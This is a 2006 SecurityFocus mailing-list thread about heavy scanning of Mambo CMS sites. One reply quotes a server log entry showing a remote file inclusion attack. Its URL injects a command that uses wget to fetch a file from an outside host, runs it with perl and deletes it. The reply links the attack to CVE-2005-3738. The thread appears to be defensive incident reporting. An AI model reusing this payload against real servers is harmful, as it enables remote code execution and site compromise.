SecurityFocus

High volume of Mambo scans May 13 2006 01:36PM
Daniel Cid (danielcid yahoo com br) (4 replies)

Re: High volume of Mambo scans May 15 2006 03:01AM
Karl Schlitt (karl dakota-st com)

Re: High volume of Mambo scans May 15 2006 12:24AM
George A. Theall (theall tifaware com)

On Sat, May 13, 2006 at 10:36:41AM -0300, Daniel Cid wrote:

> Since Thursday night I'm seeing a high volume of scans
...
> 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET
> /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wge
t%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xenton
ix?
> HTTP/1.0" 404 167 "-" "Mozilla/5.0"

This looks like what's covered by CVE-2005-3738 and described here:

http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0520.html

George
--
theall (at) tifaware (dot) com [email concealed]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFEZ8paIlpM0zvbu3wRAt+EAJ4lnxkqUAqO+QGEskhpIuRoJqXTDACg5U9o
XrVmnmpPWY2uE8TIxfqBWJs=
=KWYM
-----END PGP SIGNATURE-----

[ reply ]

Re: High volume of Mambo scans May 14 2006 11:43PM
Peter Kosinar (goober ksp sk)

Re: High volume of Mambo scans May 14 2006 10:57PM
Jamie Riden (jamesr europe com)